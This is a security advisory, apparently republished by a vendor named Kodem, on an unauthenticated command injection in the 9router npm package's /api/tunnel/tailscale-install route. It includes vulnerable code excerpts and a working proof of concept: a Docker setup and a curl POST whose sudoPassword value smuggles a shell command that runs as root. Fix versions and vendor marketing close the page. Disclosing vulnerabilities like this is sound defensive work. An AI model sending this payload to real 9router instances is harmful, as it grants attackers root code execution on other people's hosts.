Summary
9router: Missing Authorization and OS Command Injection
Full technical description
Unauthenticated RCE via /api/tunnel/tailscale-install
Affected: 9router (npm package), current master (v0.4.39).
POST /api/tunnel/tailscale-install accepts a JSON body with a sudoPassword field and pipes it, followed by the body of https://tailscale.com/install.sh, into a child process spawned as sudo -S sh. The route is not present in the dashboard middleware matcher in src/proxy.js, so the request reaches the handler without invoking dashboardGuard.proxy(). In deployments where the Node process runs as root (Docker images derived from node:* without a USER directive, npm i -g 9router invoked as root, or systemd units without User=), the spawned sh runs as root and executes the attacker-supplied bytes.
Details
1. Middleware matcher (src/proxy.js:3-15)
export const config = {
matcher: [
"/",
"/dashboard/:path*",
"/api/shutdown",
"/api/settings/:path*",
"/api/keys",
"/api/keys/:path*",
"/api/providers/client",
"/api/provider-nodes/validate",
"/api/cli-tools/:path*",
"/api/mcp/:path*",
],
};
Next.js invokes the middleware only for paths matching this list. Routes that are not listed, including the entire /api/tunnel/* family, do not invoke dashboardGuard.proxy(). No cookie, JWT, CLI token, or Host-header check is applied to them.
2. Route handler (src/app/api/tunnel/tailscale-install/route.js:18-67)
export async function POST(request) {
const body = await request.json().catch(() => ({}));
...
const sudoPassword =
body.sudoPassword || getCachedPassword() || await loadEncryptedPassword() || "";
...
const result = await installTailscale(sudoPassword, shortId, (msg) => {
send("progress", { message: msg });
});
...
}
body.sudoPassword comes from the request body and is passed to installTailscale, which dispatches to installTailscaleLinux on Linux.
3. Linux installation routine (src/lib/tunnel/tailscale.js:304-341)
async function installTailscaleLinux(sudoPassword, log) {
log("Downloading install script...");
return new Promise((resolve, reject) => {
const curlChild = spawn("curl", ["-fsSL", "https://tailscale.com/install.sh"], { ... });
let scriptContent = "";
curlChild.stdout.on("data", (d) => { scriptContent += d.toString(); });
curlChild.on("exit", (code) => {
if (code !== 0) return reject(...);
log("Running install script...");
const child = spawn("sudo", ["-S", "sh"], { stdio: ["pipe", "pipe", "pipe"], windowsHide: true });
...
child.stdin.write(`${sudoPassword}\n`); // ← from request body
child.stdin.write(scriptContent);
child.stdin.end();
});
});
}
The byte stream sent to the stdin of the sudo -S sh child process is:
<sudoPassword from request body>\n
<https://tailscale.com/install.sh body>
When the caller is already root, has NOPASSWD configured for the user, or has a recent sudo timestamp cache, sudo -S sh does not read stdin for a password, it execs sh directly. The new sh process inherits the stdin pipe and reads it line by line:
- The
sudoPasswordvalue from the request, interpreted as the first shell command. - The
install.shbody, interpreted as subsequent shell input.
Appending ; exit 0 to the sudoPassword value causes sh to exit before the legitimate install.sh body runs. The host executes only the request-supplied bytes, as the 9router process user.
Both "Docker container running as root" and "npm i -g 9router on a host with NOPASSWD sudo" reach this path.
PoC
The reproduction below is self-contained: build a representative target image (Node process running as root, with sudo and curl on PATH), start it, send one unauthenticated POST with curl, and read the file written by the payload.
Step 1, build the target image
docker build -t 9router-vuln-root - <<'EOF'
FROM node:22-bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends \
sudo curl ca-certificates \
&& rm -rf /var/lib/apt/lists/*
RUN npm install -g [email protected]
EXPOSE 20128
CMD ["9router"]
EOF
Step 2, start the target
docker run -d --rm --name target -p 127.0.0.1:20129:20128 \
9router-vuln-root 9router --log --skip-update
until curl -fs -o /dev/null http://127.0.0.1:20129/api/health; do sleep 1; done
Step 3, exploit (one unauthenticated POST)
curl -sN -X POST http://127.0.0.1:20129/api/tunnel/tailscale-install \
-H 'Content-Type: application/json' \
-d '{"sudoPassword":"id > /tmp/pwned.txt; exit 0"}'
Step 4, verify
docker exec target cat /tmp/pwned.txt
# uid=0(root) gid=0(root) groups=0(root)
The trailing "Tailscale not installed" line is a consequence of ; exit 0 terminating sh before the legitimate install.sh body executed; the id > /tmp/pwned.txt write completed earlier in the same sh invocation. The POST carried no credentials, cookies, or prior state.
Impact
Type: Improper Access Control + OS Command Injection (CWE-862 + CWE-78).
Affected operators: 9router operators on Linux/macOS whose deployment matches one of the following configurations:
| Configuration | Example | Outcome |
|---|---|---|
| Node process runs as root | Custom Dockerfile without USER, systemd unit without User=, sudo npm i -g 9router && sudo 9router |
Unauthenticated remote root RCE (primary case in this report) |
Node process runs as a normal user with NOPASSWD sudo |
Developer laptop, CI runner, or single-tenant VPS where the operator's user has NOPASSWD: ALL |
Unauthenticated remote RCE as the operator's user; root reachable via sudo from the foothold |
Node process runs as a normal user without NOPASSWD and no stored password |
Hardened multi-user host | The spawn runs but sudo rejects the supplied value. No RCE; the request still triggers an outbound fetch from tailscale.com and the SSE error stream reveals platform information |
Untrusted input reaches a shell command, allowing arbitrary commands to run on the host. Typical impact: code execution in the application's environment.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-G6G7-PVMX-M74P? GHSA-G6G7-PVMX-M74P is a critical-severity OS command injection vulnerability in 9router (npm), affecting versions < 0.4.45. It is fixed in 0.4.45. Untrusted input reaches a shell command, allowing arbitrary commands to run on the host.
- Which versions of 9router are affected by GHSA-G6G7-PVMX-M74P? 9router (npm) versions < 0.4.45 is affected.
- Is there a fix for GHSA-G6G7-PVMX-M74P? Yes. GHSA-G6G7-PVMX-M74P is fixed in 0.4.45. Upgrade to this version or later.
- Is GHSA-G6G7-PVMX-M74P exploitable, and should I be worried? Whether GHSA-G6G7-PVMX-M74P is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-G6G7-PVMX-M74P is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-G6G7-PVMX-M74P? Upgrade
9routerto 0.4.45 or later.